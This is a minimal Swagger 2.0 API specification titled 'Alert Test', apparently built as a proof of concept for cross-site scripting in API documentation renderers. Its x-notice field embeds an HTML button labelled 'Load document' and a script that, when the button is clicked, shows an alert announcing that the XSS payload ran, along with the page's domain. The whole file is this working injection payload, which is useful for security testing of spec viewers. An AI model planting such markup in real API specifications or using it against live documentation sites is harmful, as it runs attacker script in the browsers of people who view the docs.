swagger: '2.0'
info:
  title: Alert Test
  x-notice: |
    <button id="xssbtn" style="padding: 12px 28px; background: #f39c12; color: white; border: none; border-radius: 6px; font-size: 16px; cursor: pointer; margin: 20px auto; display: block;">
      Load document
    </button>

    <script>
      setTimeout(() => {
        let btn = document.getElementById('xssbtn');
        if (btn) {
          btn.onclick = () => {
            alert("XSS payload executed!\nDomain: " + document.domain);
          };
        }
      }, 800);
    </script>
  version: 1.0.0
paths: {}
